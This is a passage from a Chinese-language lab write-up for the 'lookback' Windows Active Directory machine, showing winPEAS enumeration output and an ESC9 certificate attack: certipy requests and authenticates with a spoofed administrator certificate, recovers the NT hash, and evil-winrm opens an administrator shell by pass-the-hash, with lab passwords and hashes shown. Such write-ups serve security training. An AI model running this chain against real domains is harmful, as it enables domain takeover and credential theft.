WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ SSH keys in registry
1866
WINRM       172.16.55.128   5985   DC01             È If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#ssh-keys-in-registry
1867
WINRM       172.16.55.128   5985   DC01                 Not Found
1868
WINRM       172.16.55.128   5985   DC01
1869
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ SuperPutty configuration files
1870
WINRM       172.16.55.128   5985   DC01
1871
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Office 365 endpoints synced by OneDrive.
1872
WINRM       172.16.55.128   5985   DC01
1873
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-19
1874
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1875
WINRM       172.16.55.128   5985   DC01
1876
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-20
1877
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1878
WINRM       172.16.55.128   5985   DC01
1879
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440-1106
1880
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1881
WINRM       172.16.55.128   5985   DC01
1882
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440-1112
1883
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1884
WINRM       172.16.55.128   5985   DC01
1885
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
1886
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1887
WINRM       172.16.55.128   5985   DC01
1888
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-18
1889
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1890
WINRM       172.16.55.128   5985   DC01
1891
WINRM       172.16.55.128   5985   DC01
1892
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cloud Credentials
1893
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
1894
WINRM       172.16.55.128   5985   DC01                 Not Found
1895
WINRM       172.16.55.128   5985   DC01
1896
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Unattend Files
1897
WINRM       172.16.55.128   5985   DC01
1898
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for common SAM & SYSTEM backups
1899
WINRM       172.16.55.128   5985   DC01
1900
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for McAfee Sitelist.xml Files
1901
WINRM       172.16.55.128   5985   DC01
1902
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached GPP Passwords
1903
WINRM       172.16.55.128   5985   DC01
1904
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible regs with creds
1905
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#inside-the-registry
1906
WINRM       172.16.55.128   5985   DC01                 Not Found
1907
WINRM       172.16.55.128   5985   DC01                 Not Found
1908
WINRM       172.16.55.128   5985   DC01                 Not Found
1909
WINRM       172.16.55.128   5985   DC01                 Not Found
1910
WINRM       172.16.55.128   5985   DC01
1911
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible password files in users homes
1912
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
1913
WINRM       172.16.55.128   5985   DC01                 C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
1914
WINRM       172.16.55.128   5985   DC01
1915
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching for Oracle SQL Developer config files
1916
WINRM       172.16.55.128   5985   DC01
1917
WINRM       172.16.55.128   5985   DC01
1918
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Slack files & directories
1919
WINRM       172.16.55.128   5985   DC01               note: check manually if something is found
1920
WINRM       172.16.55.128   5985   DC01
1921
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for LOL Binaries and Scripts (can be slow)
1922
WINRM       172.16.55.128   5985   DC01             È  https://lolbas-project.github.io/
1923
WINRM       172.16.55.128   5985   DC01                [!] Check skipped, if you want to run it, please specify '-lolbas' argument
1924
WINRM       172.16.55.128   5985   DC01
1925
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Outlook download files
1926
WINRM       172.16.55.128   5985   DC01
1927
WINRM       172.16.55.128   5985   DC01
1928
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating machine and user certificate files
1929
WINRM       172.16.55.128   5985   DC01
1930
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
1931
WINRM       172.16.55.128   5985   DC01               Subject            :
1932
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
1933
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
1934
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
1935
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
1936
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
1937
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 97A1FC96F661B5E0E25802BEEB0856CA7EDE670C
1938
WINRM       172.16.55.128   5985   DC01
1939
WINRM       172.16.55.128   5985   DC01               Template           : Template=Domain Controller Authentication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.28), Major Version Number=110, Minor Version Number=0
1940
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
1941
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!
1942
WINRM       172.16.55.128   5985   DC01                    Server Authentication
1943
WINRM       172.16.55.128   5985   DC01                    Smart Card Logon
1944
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1945
WINRM       172.16.55.128   5985   DC01
1946
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
1947
WINRM       172.16.55.128   5985   DC01               Subject            : CN=dc01.lookback.htb
1948
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:42:50 AM
1949
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:42:50 AM
1950
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
1951
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
1952
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
1953
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 8D793805B6ADC17E2D7C86545C42BFDEF400BCDA
1954
WINRM       172.16.55.128   5985   DC01
1955
WINRM       172.16.55.128   5985   DC01               Template           : DomainController
1956
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
1957
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!
1958
WINRM       172.16.55.128   5985   DC01                    Server Authentication
1959
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1960
WINRM       172.16.55.128   5985   DC01
1961
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
1962
WINRM       172.16.55.128   5985   DC01               Subject            :
1963
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
1964
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
1965
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
1966
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
1967
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
1968
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 75B9E9D3B9837F6945A39582D2FC4B4D48A72815
1969
WINRM       172.16.55.128   5985   DC01
1970
WINRM       172.16.55.128   5985   DC01               Template           : Template=Directory Email Replication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.29), Major Version Number=115, Minor Version Number=0
1971
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
1972
WINRM       172.16.55.128   5985   DC01                    Directory Service Email Replication
1973
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1974
WINRM       172.16.55.128   5985   DC01
1975
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
1976
WINRM       172.16.55.128   5985   DC01               Subject            : CN=dc01.lookback.htb
1977
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
1978
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
1979
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
1980
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
1981
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
1982
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 6F0C0F282C91BEA5395643FED00EDCF70F799D29
1983
WINRM       172.16.55.128   5985   DC01
1984
WINRM       172.16.55.128   5985   DC01               Template           : DomainController
1985
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
1986
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!
1987
WINRM       172.16.55.128   5985   DC01                    Server Authentication
1988
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1989
WINRM       172.16.55.128   5985   DC01
1990
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
1991
WINRM       172.16.55.128   5985   DC01               Subject            : CN=lookback-DC01-CA, DC=lookback, DC=htb
1992
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:42:34 AM
1993
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2030 6:52:33 AM
1994
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
1995
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
1996
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
1997
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 410D6DA24FEB978AA8F2EB937906B07713D5B003
1998
WINRM       172.16.55.128   5985   DC01
1999
WINRM       172.16.55.128   5985   DC01                =================================================================================================
2000
WINRM       172.16.55.128   5985   DC01
2001
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb
2002
WINRM       172.16.55.128   5985   DC01               Subject            :
2003
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
2004
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
2005
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
2006
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
2007
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
2008
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 1D487661007C25C2362E2206BF0E5E8998B005A7
2009
WINRM       172.16.55.128   5985   DC01
2010
WINRM       172.16.55.128   5985   DC01               Template           : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.33), Major Version Number=110, Minor Version Number=0
2011
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
2012
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!
2013
WINRM       172.16.55.128   5985   DC01                    Server Authentication
2014
WINRM       172.16.55.128   5985   DC01                    Smart Card Logon
2015
WINRM       172.16.55.128   5985   DC01                    KDC Authentication
2016
WINRM       172.16.55.128   5985   DC01                =================================================================================================
2017
WINRM       172.16.55.128   5985   DC01
2018
WINRM       172.16.55.128   5985   DC01
2019
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching known files that can contain creds in home
2020
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
2021
WINRM       172.16.55.128   5985   DC01
2022
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for documents --limit 100--
2023
WINRM       172.16.55.128   5985   DC01                 Not Found
2024
WINRM       172.16.55.128   5985   DC01
2025
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Office Most Recent Files -- limit 50
2026
WINRM       172.16.55.128   5985   DC01
2027
WINRM       172.16.55.128   5985   DC01               Last Access Date           User                                           Application           Document
2028
WINRM       172.16.55.128   5985   DC01
2029
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Recent files --limit 70--
2030
WINRM       172.16.55.128   5985   DC01                 Not Found
2031
WINRM       172.16.55.128   5985   DC01
2032
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking inside the Recycle Bin for creds files
2033
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
2034
WINRM       172.16.55.128   5985   DC01                 Not Found
2035
WINRM       172.16.55.128   5985   DC01
2036
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching hidden files or folders in C:\Users home (can be slow)
2037
WINRM       172.16.55.128   5985   DC01
2038
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default User
2039
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default
2040
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users
2041
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default
2042
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users\ntuser.pol
2043
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users
2044
WINRM       172.16.55.128   5985   DC01
2045
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching interesting files in other users home directories (can be slow)
2046
WINRM       172.16.55.128   5985   DC01
2047
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
2048
WINRM       172.16.55.128   5985   DC01
2049
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
2050
WINRM       172.16.55.128   5985   DC01                  File Permissions "C:\Users\All Users\winPEASx64.exe": administrator  [Allow: AllAccess]
2051
WINRM       172.16.55.128   5985   DC01                  File Permissions "C:\Users\All Users\Seatbelt.exe": administrator  [Allow: AllAccess]
2052
WINRM       172.16.55.128   5985   DC01
2053
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Linux shells/distributions - wsl.exe, bash.exe
2054
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\wsl.exe
2055
WINRM       172.16.55.128   5985   DC01
2056
WINRM       172.16.55.128   5985   DC01                 WSL - no installed Linux distributions found.
2057
WINRM       172.16.55.128   5985   DC01
2058
WINRM       172.16.55.128   5985   DC01                    /---------------------------------------------------------------------------------\
2059
WINRM       172.16.55.128   5985   DC01                    |                             Do you like PEASS?                                  |
2060
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|
2061
WINRM       172.16.55.128   5985   DC01                    |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
2062
WINRM       172.16.55.128   5985   DC01                    |         Follow on Twitter         :     @hacktricks_live                        |
2063
WINRM       172.16.55.128   5985   DC01                    |         Respect on HTB            :     SirBroccoli                             |
2064
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|
2065
WINRM       172.16.55.128   5985   DC01                    |                                 Thank you!                                      |
2066
WINRM       172.16.55.128   5985   DC01                    \---------------------------------------------------------------------------------/
2067
WINRM       172.16.55.128   5985   DC01

think

1
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AD CS misconfigurations for ESC
2
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates.html
3
WINRM       172.16.55.128   5985   DC01             È Check for ADCS misconfigurations in the local DC registry
4
WINRM       172.16.55.128   5985   DC01               StrongCertificateBindingEnforcement:  - Allow weak mapping if SID extension missing, may be vulnerable to ESC9.
5
WINRM       172.16.55.128   5985   DC01               CertificateMappingMethods:  - Strong Certificate mapping enabled.
6
WINRM       172.16.55.128   5985   DC01               IF_ENFORCEENCRYPTICERTREQUEST set in InterfaceFlags - not vulnerable to ESC11.
7
WINRM       172.16.55.128   5985   DC01               szOID_NTDS_CA_SECURITY_EXT not disabled for the CA - not vulnerable to ESC16.
8
WINRM       172.16.55.128   5985   DC01             È
9
WINRM       172.16.55.128   5985   DC01             If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
10
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: User  (Rights: WriteProperty,ExtendedRight)
11
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: UserSignature  (Rights: WriteProperty,ExtendedRight)
12
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: ClientAuth  (Rights: WriteProperty,ExtendedRight)
13
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: EFS  (Rights: WriteProperty,ExtendedRight)
14
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: login  (Rights: ExtendedRight)
15
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: IT-login  (Rights: ExtendedRight)
16
WINRM       172.16.55.128   5985   DC01               [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).

ESC9	`StrongCertificateBindingEnforcement` 为 0（弱映射）	✅ 可配合改名账户利用

ESC9

申请证书

已经改过名的Administrator 身份申请 User 证书
改名方法见Bad Ending-证书欺诈

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# certipy req -u 'administrator @lookback.htb' -p 'ITLogin!2026#Qw' -dc-ip 172.16.55.128 \
3
  -target dc01.lookback.htb -ca lookback-DC01-CA -template User \
4
  -out /home/kali/Desktop/hmv/lookback/adminspace_user_direct_20260411
5
Certipy v5.0.4 - by Oliver Lyak (ly4k)
6

7
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.
8
[!] Use -debug to print a stacktrace
9
[*] Requesting certificate via RPC
10
[*] Request ID is 8
11
[*] Successfully requested certificate
12
[*] Got certificate with UPN 'IT-login-user@lookback.htb'
13
[*] Certificate has no object SID
14
[*] Try using -sid to set the object SID or see the wiki for more details
15
[*] Saving certificate and private key to '/home/kali/Desktop/hmv/lookback/adminspace_user_direct_20260411.pfx'
16
[*] Wrote certificate and private key to '_home_kali_Desktop_hmv_lookback_adminspace_user_direct_20260411.pfx'

回滚UPN

回滚受控账号 UPN（SID ...-1112）

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set object S-1-5-21-3830242231-3868280746-2763890440-1112 userPrincipalName -v IT-login-user@lookback.htb
3
[+] S-1-5-21-3830242231-3868280746-2763890440-1112's userPrincipalName has been updated

同步时间

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nmap -Pn -p445 --script smb2-time 172.16.55.128
3

4
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 07:19 +0000
5
Nmap scan report for dc01.lookback.htb (172.16.55.128)
6
Host is up (0.00016s latency).
7

8
PORT    STATE SERVICE
9
445/tcp open  microsoft-ds
10
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)
11

12
Host script results:
13
| smb2-time:
14
|   date: 2026-04-11T07:27:19
15
|_  start_date: N/A
16

17
Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds
18

19
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
20
└─# date -s '2026-04-11 07:27:30'
21
2026年 04月 11日 星期六 07:27:30 UTC

认证证书

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# proxychains -q certipy auth -pfx /home/kali/Desktop/hmv/lookback/_home_kali_Desktop_hmv_lookback_adminspace_user_direct_20260411.pfx -dc-ip 172.16.55.128
3
Certipy v5.0.4 - by Oliver Lyak (ly4k)
4

5
[*] Certificate identities:
6
[*]     SAN UPN: 'administrator@lookback.htb'
7
[*] Using principal: 'administrator@lookback.htb'
8
[*] Trying to get TGT...
9
[*] Got TGT
10
[*] Saving credential cache to 'administrator.ccache'
11
[*] Wrote credential cache to 'administrator.ccache'
12
[*] Trying to retrieve NT hash for 'administrator'
13
[*] Got hash for 'administrator@lookback.htb': aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34

evil-winrm

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q evil-winrm -i 172.16.55.128 -u administrator -H 'bbabdc192282668fe5190ab0c5150b34'
3

4
Evil-WinRM shell v3.9
5

6
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
7

8
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
9

10
Info: Establishing connection to remote endpoint
11
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Getflag

Thanks for reading!

MazeSec-lookback

Fri Apr 10 2026

1060 words · 4 minutes

Documentation MazeSec MazeSec Windows Machine Active Directory Kerberos Enumeration ADCS Password Attacks Lateral Movement Credential Dumping Privilege Escalation Docker

MazeSec-lookback

靶机信息

详情

启动（失败）

配置

IP地址

信息收集

rustscan

同步时间

enum4linux-ng

添加hosts

netexec

smb(shares)

smb(users)

mssql

Mssql-1433

连接(hank)

信息收集

enum-db

enum_logins

权限查询

Note数据库

users.txt

passwords.txt

netexec-密码喷洒

连接(lookback-admin)

信息收集

enum-db

enum_logins

权限查询

权限提升

前置条件

EXECUTE AS OWNER 提权

数据库所有者

exploit

步骤 1：进入 lookback 数据库

步骤 2：创建提权存储过程

步骤 3：执行存储过程

步骤 4：验证是否成功

步骤 5：启用 xp_cmdshell 并执行命令

建立隧道

Kali

MSSQL

upload

run

Sharphound

upload

run

download

Bloodhound

DB-ADMIN@LOOKBACK.HTB

IT-SEC-ADMIN@LOOKBACK.HTB

IT-ADMIN@LOOKBACK.HTB

IT-LOGIN-USER@LOOKBACK.HTB

攻击链

ACL 链式攻击

DB-ADMIN -> IT-SEC-ADMIN（定向 Kerberoast）

PowerView

upload

添加 SPN

Rubeus

upload

run

Gethash

Hashcat

IT-SEC-admin -> IT-admin（改密）

rpcclinet

netexec

IT-admin -> IT-login-user（接管对象）

步骤 1：将 IT-login-user 的所有者设置为 IT-admin

步骤 2：授予 IT-admin 对 IT-login-user 的完全控制权 (GenericAll)

步骤 3：强制重置 IT-login-user 的密码

步骤 4：验证新凭据是否有效（SMB 登录）

certipy

Bad Ending-NoPac&证书欺诈

NoPac（CVE-2021-42278/42287）

Test

Command

Ending

证书欺诈

`EXECUTE AS OWNER` 提权

步骤 1：进入 `lookback` 数据库

步骤 5：启用 `xp_cmdshell` 并执行命令

步骤 1：将 `IT-login-user` 的所有者设置为 `IT-admin`

步骤 2：授予 `IT-admin` 对 `IT-login-user` 的完全控制权 (`GenericAll`)

步骤 3：强制重置 `IT-login-user` 的密码

`IT-login-user` 更名 `administrator`（无空格-失败）

`IT-login-user` 更名 `administrator`（有空格-成功）

为 `administrator` 设置 UPN 为 `administrator@lookback.htb`